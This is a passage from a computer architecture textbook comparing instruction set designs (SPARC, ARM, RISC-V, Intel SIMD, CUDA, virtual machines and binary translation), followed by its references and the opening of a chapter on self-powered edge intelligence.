of a recursive call), the sliding window was pushed down so that the new CWP
points to the region that used to be the OUT region before (now it is considered
as IN) and new memory region is allocated within the scratchpad for Local and
OUT register regions. The old CWP was restored at return time, and the overlapped
register region can be used for returning parameters.
The overlap between the OUT registers of the caller procedure and the IN
registers of the callee procedure enables a very efficient mechanism to transfer
parameters and allows a fast implementation of a procedure call. The downside of
this mechanism is that the hardware does not support automatic protection of the
instruction window against overflow, for example, in case of deep recursion. It is up
to the process to manage it.
SPARC also presented a new method to support coprocessors. Although copro-
cessors were optional in SPARC, the ISA allowed to consider them as part of the
machine’s general pipeline and to manage them accordingly.
The instruction set supports a single, implementation-dependent coprocessor (see
Table 5). The coprocessor could have an independent set of registers but must have
a state register and a condition register. All coprocessor data and control/status
registers could be accessed via two special load/store coprocessor instructions that
use one of the formats presented in Table 5.
The ability to integrate accelerators and user-defined instructions as part of an
ISA of a RISC architecture helps to extend the RISC model but requires more
complicated design, vast support from compilers, libraries, and other software tools.
registers, R0-R7, the Program Counter (PC), the stack pointer register (SP), the link
register (LR), and the process state control Register CPSR. The system also uses
some hidden registers, such as the SPSR that keeps the saved state of the system, to
allow fast interrupts; some versions use performance counters and more.
66 A. Mendelson
Thumb has two versions, Thumb-I and Thumb-II. Thumb-I mainly represents
2 bytes instruction decoding, and Thumb-II extends it with mainly more 4 bytes
instruction decoding so that Thumb-II represents a hybrid instruction decoding
length (2 and 4 bytes).
ARM7-32 Bits
ARM7-32 bits represent a family of chips, each aimed at a different market, with
different optimization points. Thus, most of the differences appear at the system
level (and not at the level of the ISA). The family is divided into mainly three
categories (AKA profiles):
Since this chapter mainly focuses on the ISA of ARM7, we will ignore the
system-level differences among these classes. The format of different instruction
formats of ARM7 appears in Table 7.
In order to allow better control over power consumption, ARM7 adds predication
bits to control many of its instructions. Predications were proven to be an efficient
mechanism to allow the compiler to indicate to the architecture if an instruction
needs to be executed or not. When predications are used, the execution of instruction
takes place only if the condition bits are reset (0). This technique is widely used in
modern parallel architectures such as CUDA.
Please note that the basic ARM7 ISA does not support floating point or SIMD
operations. Instead, these operations used to be executed as accelerators, taking
advantage of the interface for coprocessors.
The two instruction sets (Thumb and 32 bits) can coexist, so the architecture
maps the two architecture states, so they overlap, as depicted in Fig. 10. The ARM
architecture does not support a hybrid mode, where instructions from the two sets of
ISAs can interchange, but the system can be either at 16-bit mode or 32-bit mode.
In order to switch between the modes, a special instruction, BX, was added. If used
with state bit (bit 0) set, the system will switch to Thumb (16-bits) mode. Transition
to Thumb state will also occur automatically on return from an exception (IRQ, FIQ,
UNDEF, ABORT, SWI etc.), assuming the exception happened when the processor
was in Thumb state.
AA64 Architecture
The AARCH64 (Pyeatt and Ughetta 2019) is a new ISA that ARM presented
to support the new generation of 64-bit architectures. This subsection does not
intend to serve as a tutorial on AARCH64 architecture. Still, it mainly discusses
the scalability issues of different architectures belonging to the same family of
Table 7 ARM 32 bits instrution set format
31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0
Data Processing/ Cond 0 0 I Opcode S Rn Rd Operand 2
PSR Transfer
2 The Architecture
Multiply Cond 0 0 0 0 0 0 A S Rd Rn Rs 1 0 0 1 Rm
Multiply Long Cond 0 0 0 0 1 U A S RdHi RdLo Rn 1 0 0 1 Rm
Single Data Swap Cond 0 0 0 1 0 B 0 0 Rn Rd 0 0 0 0 1 0 0 1 Rm
Branch and Cond 0 0 0 1 0 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 0 0 0 1 Rn
Exchange
Halfword Data Cond 0 0 0 P U 0 W L Rn Rd 0 0 0 0 1 S H 1 Rm
Transfer: register
offset
Halfword Data Cond 0 0 0 P U 1 W L Rn Rd Offset 1 S H 1 Offset
Transfer: immediate
offset
Single Data Transfer Cond 0 1 I P U B W L Rn Rd Offset
Undefined Cond 0 1 1 1
Block Data Transfer Cond 1 0 0 P U S W L Rn Register List
Branch Cond 1 0 1 L Offset
Coprocessor Data Cond 1 1 0 P U N W L Rn CRd CP# Offset
Transfer
Coprocessor Data Cond 1 1 1 0 CP Opc CRn CRd CP# CP 0 CRm
Operation
Coprocessor Cond 1 1 1 0 CP Opc L CRn Rd CP# CP 1 CRm
Register Transfer
Software Interrupt Cond 1 1 1 1 Ignored by processor
67
68 A. Mendelson
Lo Registers
R2 R2
R3 Æ R3
R4 Æ R4
R5 Æ R5
R6 Æ R6
R7 Æ R7
R8
R9
H i g h Reg i s ter s
R10
R11
R12
SP (R13) Æ SP (R13)
LR (R14) Æ LR (R14)
PC(R15) Æ PC(R15)
CPSR Æ CPSR
SPSR Æ SPSR
The AARCH64 uses a handful of instruction formats (see Table 8) that help keep
a simple instruction decoding scheme but do not allow it to maintain compatibility
with previous generations.
When looking at the system-level support of different ARM cores, there are
significant differences between chips belonging to a different group; for example,
processors in the R series support faster support for Interrupts to support real-time
applications. In addition, the definition and the implementation of the TrustZone
(security extension) are different for Series M and the Series A.
Research comparing the ARM ISA to X86 ISA [Ark (2017)][Akr (2019)] did not
find fundamental differences which are related to the ISA between these alternatives
in terms of performance. But when comparing the power consumption and the
design complexity of these alternatives, the use of fixed-size instruction format
used to have a considerable advantage, mainly when attempting to decode several
instructions in parallel. This is one of the major reasons ARM is more popular than
Intel in edge and mobile devices.
RISC-V is an open ISA that attracts many researchers and industries. To get around
the scalability issue, RISC-V came out with a unique approach; it defines a basic
ISA that resembles MIPS architecture and a set of extensions, each aim to meet
70
different market segments. As a result, all RISC-V processors must support the
common basic ISA, but can still be optimized to meet specific goals.
them. But a RISCV developer can decide what extensions to implement and what
extensions are not needed for the specific product or market the core is aiming at.
The advantage of this approach is that it allows the core architect to assemble a
core that best fits its needs in terms of power, area, and performance concerning
the product’s specific needs. It also allows maintaining compatibility with respect
to a specific extension. The downside of this approach is that it creates software
incompatibility between different cores. Hence, core and code you develop for one
market most likely could not be used as part of another market.
For the reader’s benefit, we chose a handful of examples of extensions out of a
larger list of options discussed in the RISCV committee.
• AMOSWAP.W/D
• AMOADD.W/D
• AMOAND.W/D
• AMOOR.W/D
• AMOXOR.W/D
• AMOMAX[U].W/D
• AMOMIN[U].W/D
the ISA and handling them as a separate execution pipe which can be implemented
using a separate hardware module.
The F extension assumes a dedicated floating-point registers file, containing 32
registers f0 –f31 , each FLEN bits wide, and a floating-point control and status register
fcsr. FLEN is defined to be 32 in the case of single-precision FP, 64 in the case of
double-precision FP and 128 in the case of quad-precision FP.
The extension defines special instructions to load and store data from/to memory
to FP register file. The spec also defines basic operations such as FADD.S,
FSUB.S, FMUL.S, and FDIV.S operations to perform single-precision floating-
point addition, subtraction, multiplication, and division between rs1 and rs2, writing
the result to rd. It also defines more sophisticated instructions such as FMIN.S and
FMAX.S or the FSQRT.S, computes the square root of rs1, and writes the result
to rd.
The ISA is the layer that connects the software layer and the hardware implemen-
tation. In this chapter, we described and discussed three approaches for selecting
ISA. The CISC tries to provide the maximum expressive power to each instruction,
the RISC approach calls to simplify the ISA to allow more software optimizations
(mainly due to the use of three-operands instructions and to accelerate the speed
of the processor). Finally, the RISCV approach calls for a standard “basic ISA”
architecture with extensions that aim to solve specific needs.
Each of these approaches has its advantages and disadvantages. The use of
CISC architecture eases the process of maintaining backward compatibility, with
the cost of efficiency of the decoding process and the increasing cost of doing
parallel decoding. On the other hand, using RISC can improve performance and
enable simple parallel decoding. But, this approach makes backward compatibility
to become very difficult. Using the RISCV approach seems to be a good trade-
off between the RISC and the CISC approach since it can maintain compatibility
(at least for the basic ISA) and achieve good scalability and performance. Still,
it causes an inherent SW compatibility challenge between cores that use different
extensions since the software that runs on one processor may not be able to run on
other processors.
as indicated in Fig. 13. SIMD saves extra decoding power, complexity, and the
need to verify data dependencies. The SIMD usually works on dedicated vector
registers and has a fixed number of elements it affects. As a result, the instruction
code for adding four elements differs from the instruction code that works on eight
elements. Vector extensions, on the other hand, usually operate on memory and can
have a variable size. This subsection will discuss these two forms of operations on
n-dimensional arrays of elements.
SIMD Architectures
SIMD (Single Instruction Multiple Data) presents a simple way to expose parallel
execution to the hardware. The SIMD assumes that the SW guarantees that no
dependencies exist between the operation. In return, the architecture ensures that all
operations be executed in parallel, as indicated by Fig. 14, which shows an addition
operation using arrays of four elements.
Although many architectures adopt SIMD operations, this chapter focuses on
Intel’s family of SIMD instructions. In order to support that, Intel architecture
extends the ISA to include vector registers. The different generations of SIMD
operations use a different number of elements in each Register, as indicated in
Fig. 15.
2 The Architecture 75
YMM0
float float float float float float float float
FP
Double Double Double Double
32 32 32 32 32 32 32 32
Integer
16 16 16 16 16 16 16 16 16 16 16 16 16 16 16 16
8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8
MMX
MMX ISA extension was the first SIMD instruction set that Intel added to their
core (Pentium P5) to support multimedia applications (Peleg and Weiser 1996).
MMX defines eight new registers, named MM0 through MM7, 64 bits wide
that can store two 32-bit integers, four 16-bit integers, or eight 8-bit integers in
parallel (see Fig. 15). MMX was mainly targeted to compete with multimedia
acceleration cards, such as audio cards that were very popular that days. Thus, MMX
supports integer operations only, but the user could use fixed-point math if floating-
point operations were needed. Such support is sufficient for general digital signal
processing applications and audio-related operations.
To support fast context switch and fast response time to interrupt the MMX
registers are aliases for the existing x87 floating-point unit (FPU) registers. At the
event of a context switch, the entire state of the task needs to be saved. By sharing
the FP and MMX states, Pentium cores support efficient context switch and interrupt
service operations.
SSE initially added eight new 128-bit registers known as XMM0 through
XMM7. The x86-64 bits instruction set added a further eight registers XMM8
through XMM15.
SSE used only a single data type for XMM registers:
Instruction Description
VBROADCASTSS, Copy a 32-bit, 64-bit, or 128-bit memory operand to all elements of a
VBROADCASTSD, XMM or YMM vector register.
VBROADCASTF128
VMASKMOVPS, Conditionally reads elements from a SIMD vector memory operand
VMASKMOVPD into a destination register
VPERM2F128 Shuffle the four 128-bit vector elements of two 256-bit source
operands into a 256-bit destination operand
VPSRAVD Shift right arithmetically. Allows variable shifts where each element
is shifted according to the packed input.
AVX-512 extension is the latest version of the advanced ISA for SIMD opera-
tions Intel has in that family. AVX-512 extends the registers to 512 bits long, adding
hundreds of new instructions supporting many different options for using wide
vector operations. The standard of AVX-512 suggests multiple possible extensions
2 The Architecture 77
• AVX-512 Foundation (F) – presents the EVEX coding scheme to support 512-
bit registers and operations. It also defines options for using masks, broadcast
parameters, how to make the rounding, what exceptions can occur, and more.
• AVX-512 Conflict Detection Instructions (CD) – provides hardware support
for conflict detection. It is mainly gusseted to be used to allow more loop
optimizations and to support transaction-memory like operations.
• AVX-512 Prefetch Instructions (PF).
The AVX-512 was so complicated that Intel decided to drop much of it from its
current generation of CPU, Alder Lake (Ian Cutress 2021), but we may expect it to
come back in the future.
The XSAVE instruction supports the saving and the restoring operations of the
AMX internal state.
• It consumes a relatively large area but benefits only applications that can take
advantage of it; as Amdahl low indicates (Amdahl 2013), the overall performance
of new technology is limited to the frequency that feature is being used. Thus,
it may be very beneficial for some applications, but a loss of opportunity for
applications that do not use it. Thus, it is not always clear if adding such a new
feature, mainly for general-purpose computers, is worth the overhead.
• SIMD instructions have a fixed size. Thus, you need to recompile your code
depending on the hardware you use.
• Managing the vector register file is quite complicated.
The SIMD approach Intel took also presents the forward compatibility issue. A
programmer needs to rewrite her application each time that technology changes. As
will be indicated when we discuss the solutions taken by CUDA’s developers (see
section “HW/SW Codesign: The CUDA Approach”), a different approach can ease
these issues.
• SIMD performs operations between registers, while vectors can perform the
operations directly on memory (at least from the user perspective). Please note
that at the micro-operation level, vector operations are often divided into three
pipelined stages:
– Bring data from memory to very long registers. The data can be located in
noncontinuous locations in the memory. In this case, a gather operation may
be needed.
2 The Architecture 79
– Perform the math operations (most of the time SIMD operations are being
used for that).
– Write the data back to memory (scatter may be needed for that).
• From the ISA perspective, the same instruction format is used to handle vectors
of different sizes. It helps to maintain backward compatibility and the use of
libraries that will be agnostic to the length of the vectors.
Please note that most vector machines use large register files to support vectors
that can be managed as compiler-controlled buffers. It allows the system to hide
memory latency and leverage memory bandwidth.
Cross-Layers Optimizations
Background
R1 = 10 R1 = 10
R2 = 20 If (R3>0)
R5 = 30 R2 = 20 \\Delay slot #1
If (R3>0)
R5 = 30 \\Delay slot #1
Do something1
else
Do something1
do something else else
do something else
(a) W/O delay branch (b) with 2 delay branches
VLIW Architectures
R1 = 10+2
R2 = 20+1
R3 = R1 + R2
CUDA – Compute Unified Device Architecture (NVIDIA 2007; Hwu et al. 2022)
presented a new approach to how programs and hardware should be developed. The
new approach calls for HW/SW codesign that considers the characterization of the
domain it targets and adjusts it to the characterization of the GPU Nvidia built. As
before, this chapter does not intend to cover the entire history of CUDA to provide a
comprehensive list of the features CUDA supports. Still, it aims to focus on its main
contribution to redefining the interfaces between the application, the architecture,
and the microarchitecture.
To achieve this goal, Nvidia focused on applications with vast parallelism. As
a result, CUDA supports only a limited number of data structures: scalars, 1D, 2D,
and 3D arrays of memory. A CUDA code describes the operations that the processor
executes as well as the Code that the Accelerator (GPU) runs (see Fig. 19).
In the past, the user had to move data between the CPU’s main memory to the
GPU’s main memory. Today, due to the new virtual shared memory technology, the
system will manage the location of the data automatically and move it if needed.
2 The Architecture 83
element within a block. All threads handed data points belonging to the same block
can share information, but threads belonging to different data blocks cannot share
data. This SW/HW codesign can be used to simplify the hardware and for using
other mechanisms that otherwise could not be considered.
CUDA presents the notion of two parallelism levels; the grid’s partition into
independent blocks, as depicted in Fig. 20 serves as the higher level of parallelism.
However, the system also has a hardware mechanism capable of collecting all
independent instructions located at the same IP within a block (but in different
threads) into a special WRAP structure and executing it in an execution unit
resembling SIMD. This capability is the lower level of parallelism, and Nvidia
calls this execution a SIMT mode. NVIDIA distinguishes between SIMD and SIMT
modes; under SIMD the same operation is being broadcast by different execution
units, and the operation is done on different data items. In SIMT (single instruction
multiple threads), multiple threads are being executed in a lock-step manner, but a
predicator controls each thread, so not all threads may execute the same instruction
all the time.
Nvidia uses CUDA to target different markets and to support different gener-
ations of GPU cards, each of them may target different markets and may need
different characterization of the hardware and the software. To cope with that (1)
Nvidia added the notion of CUDA capabilities to indicate what features are sup-
ported (WIKIPEDIA 2022), (2) CUDA uses PTX as an intermediate representation
(IR) which is translated to the features and the assembly of the specific device, and
(3) the different Nvidia graphics card does not guarantee to be backward-compatible
in terms of power and performance. An application that runs on a newer version of
GPUs is not guaranteed to preserve or improve performance with respect to running
the same code on older architecture.
So far, we have mainly focused on the relations between the ISA and the imple-
mentation as represented by the microarchitecture. In this chapter, we will look at
solutions that aim to overcome the limitations an ISA presents.
Java was one of the first systems to use a virtual machine (Lindholm and Yellin
1996) that uses an intermediate representation, called bytecode, as the ISA to be
compiled and optimized (Albert et al. 2007). Sun Microsystems invented Java
and described the language as “write once run anywhere”; meaning that the same
intermediate representation (IR) of a code could run on any hardware.
To achieve that, Java source code is compiled to a virtual machine, and each
architecture needs to compile or Just-In-Time (JIT) translation the code from the
2 The Architecture 85
virtual machine IR into the actual assembly code that can run on the specific
hardware. Since architectures are very different regarding the number of registers,
ISA, etc., Java virtual machine decided not to target any existing architectures.
Instead, it decides not to use any register but to adopt the Polish notation, meaning
all operations are transferred using the struck memory (Bredlau and Deremer 2001).
Java also decided not to allow direct system calls or any other resources of the actual
machine. Instead, it provides an interface to communicate with the actual operating
systems and resources.
Today the notion of using a virtual machine and intermediate representation is
quite common for many systems, although many times for different reasons; a few
examples are as follows:
• LLVM (Sarda and Pandey 2015), one of the most commonly used compilers,
uses IR to represent the results of the compilation of many different programming
languages so that it can run modules written in different programming languages.
• Nvidia uses the PTX IR (NVIDIA 2022) to unify all the different GPUs they
need to support.
• OMNX (OMNX 2020) is an open specification consisting of three main compo-
nents: (1) an extensible computation graph model, (2) standard data types, and (3)
built-in operators. OMNX intends to unite the definition of other IR of different
environments that aim to support neural network applications.
• Python (VanRossum and Drake 2010) and other scripting languages are using
virtual environments and IR.
Binary Translation
In 2005, Apple decided to change the main CPU on their laptops and desktop from
IBM to Intel. This strategic move was enabled by the use of a binary translation
SW layer called Rosetta. Recently, Apple decided to make another transition and
to move from Intel-based processors to ARM-based cores. This transition was also
supported by a newer version of the binary translation code, Rosetta-II (Apple 2021;
Dalakoti and Chakraborty 2022).
Apple was not the first company that use binary translation, but most other
companies used it to run multi-ISA Software on their architecture. To list a few
of them:
• Digital-corporation started using binary translation systems during the 70th and
early 80th. The FX! (Hookway and Herdeg 1997) aimed to run X86 code on
VAX machine, and the AXP aimed at running VAX and MIPS Code on the newly
Alpha processor. Although the commercial success of these systems was limited,
it enabled the development of other binary translation systems that showed to be
more mature and could achieve better performance.
86 A. Mendelson
• Transmeta was a company that aimed to run X86 code on top of VLIW, RISC-
based architecture, to create a low-power X86 core (Klaiber 2000). The company
produced two cores named Crusoe and Efficeon but had only limited success.
• The System As a Service (SAS) that cloud computers provide is based on the
ability of the host architecture to run any code that was compiled for any other
ISA (Smith and Nair 2005).
Summary
This chapter described different approaches for developing new architecture and
new ISA. The chapter shows that commercial reasons, such as compatibility, usage
models, low power core, and more, determine what ISA best fits the market’s needs
and will hopefully become commercially successful.
As this chapter indicated, it is extremely important to distinguish between
general-purpose computers and dedicated, domain-specific architectures. General-
purpose architectures need to take care of scalability, backward compatibility,
different types of application optimizations, etc. But, domain-specific architectures
can rely on the characterization of the application or the market they are currently
targeting.
As the last section indicates, the importance of the ISA and the backward
compatibility reduces over time since modern processors have enough computing
power to spar to minimize the impact of overhead created by the binary translation
phase.
But, when looking at domain-specific systems and systems with special needs
such as low power or the use of massive networking and vast physical memory,
the ability to adjust the ISA and the potential extensions of the architecture are still
playing a significant role in achieving the goals of the system.
References
Albert E, Arenas P, Genaim S, Puebla G, Zanardini D (2007) Cost analysis of Java bytecode.
Programming Languages and Systems, pp 157–172
AMD (2000) The AMD x86-64 architecture. Retrieved from http://www.x86-64.org/
Amdahl GM (1967) Validity of the single processor approach to achieving large scale computing
capabilities. In: Spring Joint Computer Conference, pp 18–20
Amdahl GM (2013) Computer architecture and amdahl’s law. Computer:38–46
Apple (2021) Rosetta 2 binary translation comprehensive supported instruction set list. Retrieved
from https://developer.apple.com/forums/thread/653902
ARM (1995) ARM7TDMI data sheet. Retrieved from https://www.dwedit.org/files/ARM7TDMI.
pdf
ARM (2021) Introducing NEON development. Retrieved from https://developer.arm.com/
documentation/dht0002/a/Introducing-NEON/What-is-NEON-
Badeau RW, Bahar R, Bernstein D, Biro L, Bowhill W, Brown J et al (1992) A 100-Mhz
micropipelined VAS microprocessor. IEEE J Solid-State Circuits:1585–1598
2 The Architecture 87
Bredlau C, Deremer D (2001) Assembly language through the Java virtual machine. In: Proceed-
ings of the Thirty-Second SIGCSE Technical Symposium on Computer Science Education, pp
194–198
Burroughs Corporation (1972) Burroughs B-1700 software operational guide
Dalakoti V, Chakraborty D (2022) PPLE M1 chip vs intel (X86). EPRA Int J Res Dev:207–211
Dennard RH, Gaensslen FH, Yu H-N, Rideout VL, Bassous E, LeBlanc AR (1974) Design of ion-
implanted MOSFET’s with very small physical dimensions. IEEE J Solid State Circuits:256–
268
DeWitt DJ, Schlansker MS, Atkins DE (1973) A microprogramming language for the Burroughs
B1726. In: Workshop of microprogramming, pp 21–29
Engineering S (1991) Makimoto’s wave. Retrieved from https://semiengineering.com/
knowledge_centers/standards-laws/laws/makimotos-wave/
Espasa R, Valero M, Smith JE (1998) Vector architectures: past, present, and future. In: ICS. ACM,
pp 13–17
Fisher JA (1981) Trace scheduling: a technique for global microcode compaction. IEEE Trans
Comput:478–490
Fisher JA (1983) Very long instruction word architectures and the ELI-512. In: 10th Annual
International Symposium on Computer Architecture, pp 140–150
Flynn MJ (1972) Some computer organizations and their effectiveness. IEEE Trans Comput:948–
960
Foster CC, Riseman EM (1972) Percolation of code to enhance parallel dispatching and execution.
IEEE Trans Comput 21(12):1411–1415
Furber SB (2000) ARM system-on-chip architecture. Pearson Education
Garner RB (1988) The scalable processor architecture (SPARC). In: COMPCON Spring 88 Thirty-
Third IEEE Computer Society International Conference. IEEE, pp 3–31
Gustafson JL (1988) Reevaluating Amdahl’s law. Commun ACM:532–533
Hennessy JL, Patterson DA (2007) Computer architecture: A quantitative approach. Morgan
Hennessy J, Jouppi N, Przybylski S, Rowen C, Gross T, Baskett F, Gill J (1982) MIPS: a
microprocessor architecture. ACM SIGMICRO Newsl:17–22
Hill MD, Marty MR (2008) Amdahl’s law in the multicore era. Computers:33–38
Hookway RJ, Herdeg MA (1997) Digital FX! 32: combining emulation and binary translation.
Digit Tech J:3–12
Hwu W-MW, Kirk DB, Hajj IE (2022) Programming massively parallel processors – a hands-on
approach. Elsevier
Ian Cutress AF (2021) Instruction sets: Alder Lake dumps AVX-512 in a BIG way.
Anandtech. Retrieved from https://www.anandtech.com/show/16881/a-deep-dive-into-intels-
alder-lake-microarchitectures/5
IBM (2021) Using the SIMD libraries. IBM. Retrieved from https://www.ibm.com/docs/en/xl-
fortran-linux/15.1.6?topic=libraries-using-simd
Intel (2017) Intel® MovidiusTM MyriadTM. Retrieved from https://www.movidius.com/myriad2
Intel (2021a) Intel® 64 and IA-32 architectures – software developer’s manual. Retrieved
from https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-
architectures-software-developer-vol-1-manual.pdf
Intel (2021b, May) Intel architecture instruction set extensions and future features programming
reference
Kane G, Heinrich J (1992) MIPS RISC architectures. Prentice-Hall
Karthihaa A, Karthika S, Priyadharshini KM, Sivasankari L, Anand IV, Samuel TA (2021) Design
and implementation of VLIW DSP processors for high ended embedded based systems. In: AIP
Conference Proceedings
Klaiber A (2000) The technology behind Crusoe processors: low-power x86-compatible processors
implemented with Code Morphing software. Transmeta Corp
Lindholm T, Yellin F (1996) The Java virtual machine specification
Macro (1996) Instruction set reference manual. Digital Equipment Corporation
88 A. Mendelson
Mantor M (2012) AMD Radeon™ HD 7970 with graphics core next (GCN) architecture. In: IEEE
Hot Chips 24 Symposium (HCS), pp 1–35
McFarling S, Hennesey J (1986) Reducing the cost of branches. CM SIGARCH Computer
Architecture News:396–403
Neumann J (1945) First draft of a report on the EDVAC. U.S. Army Ordnance Dept. Univ.
Pennsylvania Moore, School Elect. Eng.
NVIDIA (2007) NVIDIA CUDA compute device architecture – programming guide.
Retrieved from https://developer.download.nvidia.com/compute/cuda/1.0/NVIDIA_CUDA_-
Programming_Guide_1.0.pdf
NVIDIA (2022) PTX ISA. Nvidia. Retrieved from https://docs.nvidia.com/cuda/parallel-thread-
execution/index.html
OMNX (2020) Open Neural Network Exchange Intermediate Representation (ONNX IR) specifi-
cation. Retrieved from https://github.com/onnx/onnx/blob/main/docs/IR.md
Patt Y, Patel S (2003) Introduction to computing systems. McGraw-Hill
Patterson DA, Fehr ES, Séquin CH (1979) Design considerations for the VLSI processor of X-
TREE. In: Proceedings of the 6th Annual Symposium on Computer Architecture, pp 90–101
Peleg A, Weiser U (1996) MMX technology extension to Intel architecture. Micro 16(4):42–50
Pyeatt LD, Ughetta W (2019) ARM 64-bit assembly language. Newnes
Radin G (1983) The 801 minicomputer. IBM J Res Dev 27(3):237–246
Rau BR, Fisher JA (1993) Instruction-level parallel processing: history, overview, and perspective.
J Supercomput 7(1):9–50
RISCV (2021) The RISC-V instruction set manual. Retrieved from https://riscv.org/wp-content/
uploads/2017/05/riscv-spec-v2.2.pdf
Ronen R, Eliahu A, Leitersdorf O, Peled N, Korgaonkar K, Chattopadhyay A et al (2021) The
Bitlet model: A parameterized analytical model to compare PIM and CPU systems. ACM J
Emerg Technol Comput Syst:1–29
Rotem E, Yoaz A, Rappoport L, Robinson SJ, Mandelblat JY, Gihon AE (2022) Intel Alder Lake
CPU architecture. MICRO:13–19
Russell RM (1978) The CRAY-1 computer system. Commun ACM:63–72
Sarda S, Pandey M (2015) LLVM essentials. Paket
Sharangpani H (1999a) Intel® Itanium™ processor microarchitecture overview. Microprocessor
Forum 10(4)
Sharangpani H (1999b) Itanium™ processor microarchitecture overview. Microprocessor Forum
Singh A (1988) The 8088 microprocessor: programming, interfacing, software, hardware, and
applications. Prentice-Hall
Smith JE, Nair R (2005) Virtual machine architectures, implementations and applications. Morgan
Kaufmann Publishers
Solomon B, Mendelson A, Orenstien D, Almog Y, Ronen R (2001) Micro-operation cache: a power
aware frontend for variable instruction length ISA. In: International Symposium on Low Power
Electronics, pp 4–9
Traore M, Langlois JM, David JP (2022) ASIP accelerator for LUT-based neural networks
inference. In: IEEE Interregional NEWCAS Conference (NEWCAS), pp 524–528
Tucker SG (1967) Microprogram control for system/360. IBM Syst J 6(4):222–241
Turing AM (1938) On computable numbers, with an application to the Entscheidungsproblem. A
correction. In: London mathematical society. Oxford Academic, London, pp 544–546
Valiant LG (1990) A bridging model for parallel computation. Commun ACM:103–111
VanRossum G, Drake FL (2010) The python language reference. Python Software Foundation,
Amsterdam
Watson W (1972) The TI ASC: a highly modular and flexible super computer architecture. In: Fall
Joint Computer Conference, pp 221–228
WIKIPEDIA (2022) CUDA. Retrieved from https://en.wikipedia.org/wiki/CUDA
Wilkes M (1951) The best way to design an automatic calculating machine. In: Computer Inaugural
Conference, Manchester.
Zhang Y, Yang W, Li K, Tang D, Li K (2021) Performance analysis and optimization for SpMV
based on aligned storage formats on an ARM processor. J Parallel Distrib Comput:126–137
Architectures for Self-Powered Edge
Intelligence 3
Amit Ranjan Trivedi, Jaeha Kung, and Jong Hwan Ko
Contents
Evolution of Edge Intelligence and a Pathway to Self-Powered Intelligent
Computations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90
Architectures for Energy Harvesting in IoT Edges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
A Self-Powered Image Sensor System with Autonomous Mode
Management (AMM) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Factors Affecting Self-Power Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
ROI-Aware Image Processing Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Moving Object Detection Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96
ROI-Based Coding Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
Resource-Aware Control of Target Data Rate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
Resource-Aware Control of Encoding Data Rate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
Architectural Support for Handling Sparsity in IoT Devices . . . . . . . . . . . . . . . . . . . . . . . . . . 101
Approaches in Matrix Multiplication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
Compressed Sparse Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Recent Hardware Architecture for Handling Sparsity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
Architectures for Power-Gating-Based Active Leakage Control . . . . . . . . . . . . . . . . . . . . . . . 111
Overview of Power-Gating . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111
Challenges and Trade-Offs in Power-Gating . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Power-Gating Efficiency Learner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
Self-Adaptive Power-Gating Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
Test Chip and Measurement Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
Conclusion and Future Roadmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
A. R. Trivedi ()
University of Illinois at Chicago, Chicago, IL, USA
e-mail: [email protected]
J. Kung
Daegu Gyeongbuk Institute of Science and Technology (DGIST), Daegu, Republic of Korea
e-mail: [email protected]
J. H. Ko
Sungkyunkwan University (SKKU), Suwon, Republic of Korea
e-mail: [email protected]
Abstract
Keywords
Artificial intelligence (AI) and machine learning (ML) algorithms have shown that
growing volume and variety of data, efficient computing and storage resources, and
data-driven learning frameworks can be exploited for highly accurate predictions in
many complex problems such as computer vision and natural language processing.
The first-generation AI/ML algorithms were mostly employed on applications
where prediction accuracy mattered the most, and improving computational effi-
ciency was an afterthought. This has changed in the present applications where
AI/ML platforms must simultaneously meet stringent accuracy, speed, and energy
constraints in intelligence processing. Among the emerging AI/ML applications,
Internet of things (IoTs) especially offer intriguing prospects. By augmenting
distributed perception and control of IoTs with the data-driven learning of AI/ML,
intelligence IoT devices can heighten awareness and unprecedented control of
their application spaces. For example, in precision agriculture, a distributed camera
3 Architectures for Self-Powered Edge Intelligence 91
network can detect disease onset by classifying crop images as healthy or diseased
to maximize the farm yield. Since network connectivity in remote agriculture fields
can be unpredictable, intelligent IoTs reduce their reliance on the cloud nodes by
